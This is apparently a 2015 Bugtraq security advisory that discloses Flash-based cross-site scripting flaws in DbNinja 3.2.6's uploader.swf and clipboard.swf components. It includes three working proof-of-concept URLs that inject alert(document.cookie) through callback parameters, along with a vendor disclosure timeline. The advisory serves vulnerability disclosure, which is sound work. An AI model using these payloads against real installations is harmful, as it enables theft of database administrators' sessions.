
Date: Thu, 28 May 2015 02:01:26 GMT
From: apparitionsec@...il.com
To: bugtraq@...urityfocus.com
Subject: DbNinja 3.2.6 Flash XSS Vulnerabilities

# Exploit Title: DbNinja Flash XSS Exploit
# Google Dork: intitle: Flash XSS
# Date: May 27, 2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: www.dbninja.com
# Software Link: www.dbninja.com
# Version: 3.2.6
# Tested on: Windows 7
# Category: Flash XSS
# CVE : NA


Source:
http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt


Product:
DbNinja is a web based application for MySQL database administration.


Advisory Information:
================================================
DbNinja multiple Flash based XSS vulnerabilities


Vulnerability Details:
=====================
The DbNinja Flash uploader component contains 2 SWF files that use Flash 'ExternalInterface' API to call Javascript functions.
These SWFs can be exploited by supplying malicious code as parameters to those functions from the URL. The text value "Copy to Clipboard" can also be changed using the "buttonText" parameter.



Exploit code(s):
===============

1- http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie)

2- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie)

3- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie) 



Disclosure Timeline:
=========================================================

Vendor Notification  May 23, 2015
May 27, 2015: Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================

Request Method(s):
                                [+] GET

Vulnerable Product:
                                [+] DBNinja 3.2.6

Vulnerable Parameter(s):
                                [+] selectCallback, dataSourceFunc & completeCallback

Affected Area(s):
                                [+] uploader.swf, clipboard.swf

===============================================================

(hyp3rlinx)
